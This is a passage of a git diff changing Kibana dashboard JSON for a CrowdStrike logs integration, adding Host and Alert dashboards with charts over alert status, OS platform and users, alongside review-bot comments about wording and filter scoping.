"showSingleSeries": false + }, + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "c5b14462-c4b7-4bc6-b826-592096b235ef", + "w": 24, + "x": 0, + "y": 17 + }, + "panelIndex": "c5b14462-c4b7-4bc6-b826-592096b235ef", + "title": "Host over Host IP [Logs CrowdStrike]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-c6d62863-d037-4156-a25c-6e4bc06b7885", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "de769611-9467-477d-9867-fc74698abdd9", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "c6d62863-d037-4156-a25c-6e4bc06b7885": { + "columnOrder": [ + "eb4c815b-4d40-4169-bba7-5cfd9408ae9a", + "396927e3-233a-4a3a-b459-929dafd53134", + "6e59d96a-2622-45fc-8b9b-ce38c1eb1556" + ], + "columns": { + "396927e3-233a-4a3a-b459-929dafd53134": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "6e59d96a-2622-45fc-8b9b-ce38c1eb1556": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "eb4c815b-4d40-4169-bba7-5cfd9408ae9a": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Device ID", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + 
"missingBucket": false, + "orderBy": { + "columnId": "6e59d96a-2622-45fc-8b9b-ce38c1eb1556", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "device.id" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "de769611-9467-477d-9867-fc74698abdd9", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "crowdstrike.host" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "crowdstrike.host" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "6e59d96a-2622-45fc-8b9b-ce38c1eb1556" + ], + "layerId": "c6d62863-d037-4156-a25c-6e4bc06b7885", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "eb4c815b-4d40-4169-bba7-5cfd9408ae9a", + "xAccessor": "396927e3-233a-4a3a-b459-929dafd53134" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": false, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": true + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "ea96fb11-edf9-470e-a7f9-903b084e1901", + "w": 24, + "x": 24, + "y": 17 + }, + "panelIndex": "ea96fb11-edf9-470e-a7f9-903b084e1901", + "title": "Host over Timestamp [Logs CrowdStrike]", + "type": "lens", + "version": "8.10.1" + } + ], + 
"timeRestore": false, + "title": "[Logs CrowdStrike] Host", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2023-12-13T12:47:28.559Z", + "id": "crowdstrike-2921b7f0-99b5-11ee-bf4d-afbc95e0486c", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "cfed76fa-d3ba-450b-8c8b-03a7e2834f7a:indexpattern-datasource-layer-200a15f3-d229-4812-ab0c-0241c9ca974e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "cfed76fa-d3ba-450b-8c8b-03a7e2834f7a:af92b18a-b19c-4eea-88d7-7eef6ca7cea7", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "be658e9b-1f41-424b-a975-ab42befcb77e:indexpattern-datasource-layer-b6c130c0-83a9-4114-a597-1044d0ee891a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "be658e9b-1f41-424b-a975-ab42befcb77e:4275918f-e9ad-4439-b16c-190021e6a4dd", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c5b14462-c4b7-4bc6-b826-592096b235ef:indexpattern-datasource-layer-ae6624d7-cc20-420b-994e-e9da30ce9d7e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c5b14462-c4b7-4bc6-b826-592096b235ef:a10dc271-d00d-4766-8ec4-28fe3978afea", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ea96fb11-edf9-470e-a7f9-903b084e1901:indexpattern-datasource-layer-c6d62863-d037-4156-a25c-6e4bc06b7885", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ea96fb11-edf9-470e-a7f9-903b084e1901:de769611-9467-477d-9867-fc74698abdd9", + "type": "index-pattern" + }, + { + "id": "crowdstrike-security-solution-default", + "name": "tag-ref-security-solution-default", + "type": "tag" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/crowdstrike/kibana/dashboard/crowdstrike-a4972bc0-fb53-11eb-abed-07307b3f2b0f.json b/packages/crowdstrike/kibana/dashboard/crowdstrike-a4972bc0-fb53-11eb-abed-07307b3f2b0f.json index 5aaa97fb365..a85671bc891 100644 
--- a/packages/crowdstrike/kibana/dashboard/crowdstrike-a4972bc0-fb53-11eb-abed-07307b3f2b0f.json +++ b/packages/crowdstrike/kibana/dashboard/crowdstrike-a4972bc0-fb53-11eb-abed-07307b3f2b0f.json @@ -60,7 +60,7 @@ "id": "", "params": { "fontSize": 12, - "markdown": "**Navigation**\n\n**Crowdstrike** \n\n[Overview](#/dashboard/crowdstrike-e64e8fe0-8210-11ee-bae0-937af575b750) \n**[FDR](#/dashboard/crowdstrike-a4972bc0-fb53-11eb-abed-07307b3f2b0f)** \n[Falcon](#/dashboard/crowdstrike-ad80a080-821b-11ee-bae0-937af575b750) \n\n\n**Overview**\n\nThis dashboards shows statistics specific to Alerts and their different alert types that is received from Crowdstrike FDR.\n\n", + "markdown": "**Navigation**\n\n**Crowdstrike** \n\n[Overview](#/dashboard/crowdstrike-e64e8fe0-8210-11ee-bae0-937af575b750) \n\n**[FDR](#/dashboard/crowdstrike-a4972bc0-fb53-11eb-abed-07307b3f2b0f)** \n\n[Falcon](#/dashboard/crowdstrike-ad80a080-821b-11ee-bae0-937af575b750) \n\n[Alert](#/dashboard/crowdstrike-d8070b00-99b3-11ee-bf4d-afbc95e0486c)\n\n[Host](#/dashboard/crowdstrike-2921b7f0-99b5-11ee-bf4d-afbc95e0486c)\n\n**Overview**\n\nThis dashboards shows statistics specific to Alerts and their different alert types that is received from Crowdstrike FDR.\n\n", "openLinksInNewTab": false }, "title": "", diff --git a/packages/crowdstrike/kibana/dashboard/crowdstrike-ad80a080-821b-11ee-bae0-937af575b750.json b/packages/crowdstrike/kibana/dashboard/crowdstrike-ad80a080-821b-11ee-bae0-937af575b750.json index 0a16a8d7dce..2f7ce172f38 100644 --- a/packages/crowdstrike/kibana/dashboard/crowdstrike-ad80a080-821b-11ee-bae0-937af575b750.json +++ b/packages/crowdstrike/kibana/dashboard/crowdstrike-ad80a080-821b-11ee-bae0-937af575b750.json 
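Review bot: The rewritten navigation markdown in the `@@ -60,7 +60,7 @@` hunk keeps the pre-existing grammar slip in the Overview sentence, `This dashboards shows statistics specific to Alerts and their different alert types that is received from Crowdstrike FDR.`; since the whole string is being replaced anyway, change it to `This dashboard shows statistics specific to alerts and their different alert types received from CrowdStrike FDR.`. The same string spells the vendor `Crowdstrike` while the panel titles added elsewhere in this change use `CrowdStrike`, so picking one spelling here keeps the dashboards consistent. This is a wording-only edit inside a JSON string value, so the surrounding saved-object structure is unaffected.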
@@ -66,7 +66,7 @@ "id": "", "params": { "fontSize": 12, - "markdown": "**Navigation**\n\n**Crowdstrike** \n\n[Overview](#/dashboard/crowdstrike-e64e8fe0-8210-11ee-bae0-937af575b750) \n[FDR](#/dashboard/crowdstrike-a4972bc0-fb53-11eb-abed-07307b3f2b0f) \n**[Falcon](#/dashboard/crowdstrike-ad80a080-821b-11ee-bae0-937af575b750)** \n\n**Overview**\n\nThis dashboards shows statistics about the different Incidents and events collected from Crowdstrike Falcon.\n\n", + "markdown": "**Navigation**\n\n**Crowdstrike** \n\n[Overview](#/dashboard/crowdstrike-e64e8fe0-8210-11ee-bae0-937af575b750) \n\n[FDR](#/dashboard/crowdstrike-a4972bc0-fb53-11eb-abed-07307b3f2b0f) \n\n**[Falcon](#/dashboard/crowdstrike-ad80a080-821b-11ee-bae0-937af575b750)** \n\n[Alert](#/dashboard/crowdstrike-d8070b00-99b3-11ee-bf4d-afbc95e0486c)\n\n[Host](#/dashboard/crowdstrike-2921b7f0-99b5-11ee-bf4d-afbc95e0486c)\n\n**Overview**\n\nThis dashboards shows statistics about the different Incidents and events collected from Crowdstrike Falcon.\n\n", "openLinksInNewTab": false }, "title": "", diff --git a/packages/trendmicro/kibana/dashboard/trendmicro-8efdcf10-a2fc-11ed-bd5a-0d4c2fb00c2c.json b/packages/crowdstrike/kibana/dashboard/crowdstrike-d8070b00-99b3-11ee-bf4d-afbc95e0486c.json similarity index 61% rename from packages/trendmicro/kibana/dashboard/trendmicro-8efdcf10-a2fc-11ed-bd5a-0d4c2fb00c2c.json rename to packages/crowdstrike/kibana/dashboard/crowdstrike-d8070b00-99b3-11ee-bf4d-afbc95e0486c.json index 618f97c6286..29f98cc2711 100644 --- a/packages/trendmicro/kibana/dashboard/trendmicro-8efdcf10-a2fc-11ed-bd5a-0d4c2fb00c2c.json +++ b/packages/crowdstrike/kibana/dashboard/crowdstrike-d8070b00-99b3-11ee-bf4d-afbc95e0486c.json 
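Review bot: Same nit as on the FDR dashboard: the new markdown string in `@@ -66,7 +66,7 @@` still reads `This dashboards shows statistics about the different Incidents and events collected from Crowdstrike Falcon.`; suggest `This dashboard shows statistics about the different incidents and events collected from CrowdStrike Falcon.` while the line is being touched. The navigation links themselves look consistent with the other dashboards in this change (same five dashboard ids, same bold marker on the current page).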
@@ -1,45 +1,9 @@ { - "id": "trendmicro-8efdcf10-a2fc-11ed-bd5a-0d4c2fb00c2c", - "type": "dashboard", - "namespaces": [ - "default" - ], - "updated_at": "2023-02-02T13:46:48.337Z", - "created_at": "2023-02-02T13:46:48.337Z", - "version": "WzE5MTcsMV0=", "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "oneLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"dc90c1e0-1105-4006-87aa-2d84fdf2224d\":{\"order\":3,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"event.type\",\"title\":\"event.type\",\"id\":\"dc90c1e0-1105-4006-87aa-2d84fdf2224d\",\"enhancements\":{}}},\"c2302e6a-a8ab-4b98-b004-96a12088df42\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"trendmicro.event.category\",\"title\":\"trendmicro.event.category\",\"id\":\"c2302e6a-a8ab-4b98-b004-96a12088df42\",\"enhancements\":{}}},\"5cb6c3b4-4c04-494a-9757-3da0089120f0\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"rangeSliderControl\",\"explicitInput\":{\"fieldName\":\"trendmicro.event.signature_id\",\"title\":\"trendmicro.event.signature_id\",\"id\":\"5cb6c3b4-4c04-494a-9757-3da0089120f0\",\"enhancements\":{}}},\"8f323dd7-18da-44e4-b535-3f7cb3584bf2\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"trendmicro.event.name\",\"title\":\"trendmicro.event.name\",\"id\":\"8f323dd7-18da-44e4-b535-3f7cb3584bf2\",\"enhancements\":{}}}}" - }, - "description": "", + "description": "Overview of the CrowdStrike Alert Logs.", "kibanaSavedObjectMeta": { "searchSourceJSON": { - "filter": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": 
"data_stream.dataset", - "negate": false, - "params": { - "query": "trendmicro.deep_security" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "trendmicro.deep_security" - } - } - } - ], + "filter": [], "query": { "language": "kuery", "query": "" @@ -54,13 +18,53 @@ "useMargins": true }, "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "**Navigation**\n\n**Crowdstrike** \n\n[Overview](#/dashboard/crowdstrike-e64e8fe0-8210-11ee-bae0-937af575b750) \n\n[FDR](#/dashboard/crowdstrike-a4972bc0-fb53-11eb-abed-07307b3f2b0f) \n\n[Falcon](#/dashboard/crowdstrike-ad80a080-821b-11ee-bae0-937af575b750) \n\n**[Alert](#/dashboard/crowdstrike-d8070b00-99b3-11ee-bf4d-afbc95e0486c)**\n\n[Host](#/dashboard/crowdstrike-2921b7f0-99b5-11ee-bf4d-afbc95e0486c)\n\n**Overview**\n\nThis dashboard shows statistics about the different alerts collected from the Crowdstrike Alert API.\n\n", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 16, + "i": "da4bfceb-5882-4577-9ead-316c338c7569", + "w": 16, + "x": 0, + "y": 0 + }, + "panelIndex": "da4bfceb-5882-4577-9ead-316c338c7569", + "title": "Table of Contents", + "type": "visualization", + "version": "8.10.1" + }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", - "name": "indexpattern-datasource-layer-c548b323-aad7-4518-b361-b6d2300d784a", + "name": "indexpattern-datasource-layer-836a096e-11de-4f16-8dc1-08de3e3a2b2f", "type": "index-pattern" } ], 
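Review bot: With the `@@ -1,45 +1,9 @@` hunk dropping the dashboard-level `data_stream.dataset` filter (the new `searchSourceJSON` has `"filter": []`), each panel now has to scope itself, but the "Alert by Status" panel introduced in `@@ -54,13 +18,53 @@` lists only the datasource-layer `index-pattern` reference, with no second reference for a filter index, unlike the later panels in this file that carry both references plus a `match_phrase` on `crowdstrike.alert`. Its `filters` block sits in unchanged lines between hunks and is not visible here, but the single reference suggests it is still the inherited `"filters": []`, in which case the `crowdstrike.alert.status` pie runs unscoped against `logs-*` rather than the alert data stream. Adding the same `{"match_phrase": {"data_stream.dataset": "crowdstrike.alert"}}` phrase filter (with its `meta.index` pointing at a new index-pattern reference) to that panel would keep the dashboard's scoping consistent with the other panels. The `id`, `type` and `namespaces` keys removed at the top of the file presumably reappear at the tail in the newer saved-object layout, as the new Host dashboard does; worth confirming the renamed file ends the same way since that part is outside this view.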
@@ -69,17 +73,29 @@ "datasourceStates": { "formBased": { "layers": { - "c548b323-aad7-4518-b361-b6d2300d784a": { + "836a096e-11de-4f16-8dc1-08de3e3a2b2f": { "columnOrder": [ - "469f7b8c-22ce-4e81-92a3-09a25d9dcc8f", - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6" + "e1dfcfae-1d38-4434-b22c-847e1a2ef8d7", + "c04767a1-9e74-4057-a95a-0d1ccb016a67" ], "columns": { - "469f7b8c-22ce-4e81-92a3-09a25d9dcc8f": { + "c04767a1-9e74-4057-a95a-0d1ccb016a67": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "e1dfcfae-1d38-4434-b22c-847e1a2ef8d7": { "customLabel": true, "dataType": "string", "isBucketed": true, - "label": "Trend Micro Event Category", + "label": "Alert Status", "operationType": "terms", "params": { "exclude": [], @@ -88,7 +104,7 @@ "includeIsRegex": false, "missingBucket": false, "orderBy": { - "columnId": "a9ca7ee9-fe03-483e-bea1-b8e2462609c6", + "columnId": "c04767a1-9e74-4057-a95a-0d1ccb016a67", "type": "column" }, "orderDirection": "desc", @@ -96,29 +112,22 @@ "parentFormat": { "id": "terms" }, - "size": 10 + "secondaryFields": [], + "size": 5 }, "scale": "ordinal", - "sourceField": "trendmicro.event.category" - }, - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Count of logs", - "operationType": "count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "___records___" + "sourceField": "crowdstrike.alert.status" } }, + "ignoreGlobalFilters": false, "incompleteColumns": {}, "sampling": 1 } } }, + "indexpattern": { + "layers": {} + }, "textBased": { "layers": {} } 
@@ -130,74 +139,58 @@ "query": "" }, "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, "layers": [ { - "accessors": [ - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6" - ], - "layerId": "c548b323-aad7-4518-b361-b6d2300d784a", + "categoryDisplay": "default", + "layerId": "836a096e-11de-4f16-8dc1-08de3e3a2b2f", "layerType": "data", - "position": "top", - "seriesType": "bar_stacked", - "showGridlines": false, - "xAccessor": "469f7b8c-22ce-4e81-92a3-09a25d9dcc8f" + "legendDisplay": "show", + "metrics": [ + "c04767a1-9e74-4057-a95a-0d1ccb016a67" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "e1dfcfae-1d38-4434-b22c-847e1a2ef8d7" + ], + "truncateLegend": false } ], - "legend": { - "isVisible": true, - "position": "right" - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide" + "shape": "pie" } }, "title": "", "type": "lens", - "visualizationType": "lnsXY" + "visualizationType": "lnsPie" }, "enhancements": {}, "hidePanelTitles": false }, "gridData": { - "h": 15, - "i": "afb76ed5-df93-4649-a1d8-ee7586c483dd", - "w": 24, - "x": 0, + "h": 16, + "i": "cf48b7df-a51b-4a21-a2f9-c4c05705b5eb", + "w": 17, + "x": 16, "y": 0 }, - "panelIndex": "afb76ed5-df93-4649-a1d8-ee7586c483dd", - "title": "Deep Security Logs Count by Trend Micro Top 10 Event Category", + "panelIndex": "cf48b7df-a51b-4a21-a2f9-c4c05705b5eb", + "title": "Alert by Status [Logs CrowdStrike]", "type": "lens", - "version": "8.6.0" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", - "name": "indexpattern-datasource-layer-c548b323-aad7-4518-b361-b6d2300d784a", + "name": 
"indexpattern-datasource-layer-b4403946-8fa4-464f-b1e2-17fae6304bb5", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "5c9cfcd1-2c7f-493f-86a5-002bcf501fde", "type": "index-pattern" } ], @@ -206,17 +199,17 @@ "datasourceStates": { "formBased": { "layers": { - "c548b323-aad7-4518-b361-b6d2300d784a": { + "b4403946-8fa4-464f-b1e2-17fae6304bb5": { "columnOrder": [ - "10d0f1f2-7bbc-413f-acd0-a00bac68f06f", - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6" + "8ad4264b-af2b-48aa-91a8-e4be5782a1c2", + "8e708f78-e313-4f7c-98dd-625bdc4ef202" ], "columns": { - "10d0f1f2-7bbc-413f-acd0-a00bac68f06f": { + "8ad4264b-af2b-48aa-91a8-e4be5782a1c2": { "customLabel": true, "dataType": "string", "isBucketed": true, - "label": "Trend Micro Event Category", + "label": "Host OS Platform", "operationType": "terms", "params": { "exclude": [], @@ -225,7 +218,7 @@ "includeIsRegex": false, "missingBucket": false, "orderBy": { - "columnId": "a9ca7ee9-fe03-483e-bea1-b8e2462609c6", + "columnId": "8e708f78-e313-4f7c-98dd-625bdc4ef202", "type": "column" }, "orderDirection": "desc", 
@@ -234,34 +227,61 @@ "id": "terms" }, "secondaryFields": [], - "size": 10 + "size": 5 }, "scale": "ordinal", - "sourceField": "trendmicro.event.category" + "sourceField": "host.os.platform" }, - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6": { + "8e708f78-e313-4f7c-98dd-625bdc4ef202": { "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Count of logs", + "label": "Count", "operationType": "count", "params": { - "emptyAsNull": true + "emptyAsNull": false }, "scale": "ratio", "sourceField": "___records___" } }, + "ignoreGlobalFilters": false, "incompleteColumns": {}, "sampling": 1 } } }, + "indexpattern": { + "layers": {} + }, "textBased": { "layers": {} } }, - "filters": [], + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "5c9cfcd1-2c7f-493f-86a5-002bcf501fde", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "crowdstrike.alert" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "crowdstrike.alert" + } + } + } + ], "internalReferences": [], "query": { "language": "kuery", @@ -271,20 +291,21 @@ "layers": [ { "categoryDisplay": "default", - "layerId": "c548b323-aad7-4518-b361-b6d2300d784a", + "layerId": "b4403946-8fa4-464f-b1e2-17fae6304bb5", "layerType": "data", - "legendDisplay": "default", + "legendDisplay": "show", "metrics": [ - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6" + "8e708f78-e313-4f7c-98dd-625bdc4ef202" ], "nestedLegend": false, "numberDisplay": "percent", "primaryGroups": [ - "10d0f1f2-7bbc-413f-acd0-a00bac68f06f" - ] + "8ad4264b-af2b-48aa-91a8-e4be5782a1c2" + ], + "truncateLegend": false } ], - "shape": "donut" + "shape": "pie" } }, "title": "", 
@@ -295,24 +316,30 @@ "hidePanelTitles": false }, "gridData": { - "h": 15, - "i": "813d3531-d392-4310-a30e-255453a47462", - "w": 24, - "x": 24, + "h": 16, + "i": "57bd2cd7-7ec5-41ae-9133-a1ec722479dc", + "w": 15, + "x": 33, "y": 0 }, - "panelIndex": "813d3531-d392-4310-a30e-255453a47462", - "title": "Deep Security Logs % by Trend Micro Top 10 Event Category", + "panelIndex": "57bd2cd7-7ec5-41ae-9133-a1ec722479dc", + "title": "Alert by OS Platform [Logs CrowdStrike]", "type": "lens", - "version": "8.6.0" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", - "name": "indexpattern-datasource-layer-c548b323-aad7-4518-b361-b6d2300d784a", + "name": "indexpattern-datasource-layer-986a7419-3b29-4812-8f1e-8648d18ce08b", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "db8d1eab-6c1e-4d8a-9efa-1f7407fc28bf", "type": "index-pattern" } ], @@ -321,17 +348,30 @@ "datasourceStates": { "formBased": { "layers": { - "c548b323-aad7-4518-b361-b6d2300d784a": { + "986a7419-3b29-4812-8f1e-8648d18ce08b": { "columnOrder": [ - "469f7b8c-22ce-4e81-92a3-09a25d9dcc8f", - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6" + "950aa189-023a-4c68-ad46-fba8eaa6dc79", + "d59a23d4-24d0-486d-8d0d-6100463dbb0c", + "029c6079-1dc5-4444-a33a-c4590403af92" ], "columns": { - "469f7b8c-22ce-4e81-92a3-09a25d9dcc8f": { + "029c6079-1dc5-4444-a33a-c4590403af92": { "customLabel": true, "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "950aa189-023a-4c68-ad46-fba8eaa6dc79": { + "customLabel": true, + "dataType": "string", "isBucketed": true, - "label": "Trend Micro Signature ID", + "label": "User ID", "operationType": "terms", "params": { "exclude": [], 
@@ -340,11 +380,11 @@ "includeIsRegex": false, "missingBucket": false, "orderBy": { - "columnId": "a9ca7ee9-fe03-483e-bea1-b8e2462609c6", + "columnId": "029c6079-1dc5-4444-a33a-c4590403af92", "type": "column" }, "orderDirection": "desc", - "otherBucket": true, + "otherBucket": false, "parentFormat": { "id": "terms" }, 
@@ -352,124 +392,13 @@ "size": 10 }, "scale": "ordinal", - "sourceField": "trendmicro.event.signature_id" + "sourceField": "user.id" }, - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Count of logs", - "operationType": "count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "___records___" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } - } - }, - "textBased": { - "layers": {} - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6" - ], - "layerId": "c548b323-aad7-4518-b361-b6d2300d784a", - "layerType": "data", - "position": "top", - "seriesType": "bar_stacked", - "showGridlines": false, - "xAccessor": "469f7b8c-22ce-4e81-92a3-09a25d9dcc8f" - } - ], - "legend": { - "isVisible": true, - "position": "right" - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 15, - "i": "5f13ec5c-aee1-4dde-92df-8cbe0ecaa7e2", - "w": 24, - "x": 0, - "y": 15 - }, - "panelIndex": "5f13ec5c-aee1-4dde-92df-8cbe0ecaa7e2", - "title": "Deep Security Logs Count by Trend Micro Top 10 Signature ID", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-c548b323-aad7-4518-b361-b6d2300d784a", - 
"type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "c548b323-aad7-4518-b361-b6d2300d784a": { - "columnOrder": [ - "469f7b8c-22ce-4e81-92a3-09a25d9dcc8f", - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6" - ], - "columns": { - "469f7b8c-22ce-4e81-92a3-09a25d9dcc8f": { + "d59a23d4-24d0-486d-8d0d-6100463dbb0c": { "customLabel": true, - "dataType": "number", + "dataType": "string", "isBucketed": true, - "label": "Trend Micro Signature ID", + "label": "User Name", "operationType": "terms", "params": { "exclude": [], 
@@ -478,94 +407,113 @@ "includeIsRegex": false, "missingBucket": false, "orderBy": { - "columnId": "a9ca7ee9-fe03-483e-bea1-b8e2462609c6", + "columnId": "029c6079-1dc5-4444-a33a-c4590403af92", "type": "column" }, "orderDirection": "desc", - "otherBucket": true, + "otherBucket": false, "parentFormat": { "id": "terms" }, - "secondaryFields": [], "size": 10 }, "scale": "ordinal", - "sourceField": "trendmicro.event.signature_id" - }, - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "% of logs", - "operationType": "count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "___records___" + "sourceField": "user.name" } }, + "ignoreGlobalFilters": false, "incompleteColumns": {}, "sampling": 1 } } }, + "indexpattern": { + "layers": {} + }, "textBased": { "layers": {} } }, - "filters": [], + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "db8d1eab-6c1e-4d8a-9efa-1f7407fc28bf", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "crowdstrike.alert" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "crowdstrike.alert" + } + } + } + ], "internalReferences": [], "query": { "language": "kuery", "query": "" }, "visualization": { - "layers": [ + "columns": [ { - "categoryDisplay": "default", - "layerId": "c548b323-aad7-4518-b361-b6d2300d784a", - "layerType": "data", - "legendDisplay": "default", - "metrics": [ - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6" - ], - "nestedLegend": false, - "numberDisplay": "percent", - "primaryGroups": [ - "469f7b8c-22ce-4e81-92a3-09a25d9dcc8f" - ] + "columnId": "950aa189-023a-4c68-ad46-fba8eaa6dc79", + "isTransposed": false + }, + { + "columnId": "029c6079-1dc5-4444-a33a-c4590403af92", + "isTransposed": false + }, + { + "columnId": "d59a23d4-24d0-486d-8d0d-6100463dbb0c", + "isTransposed": 
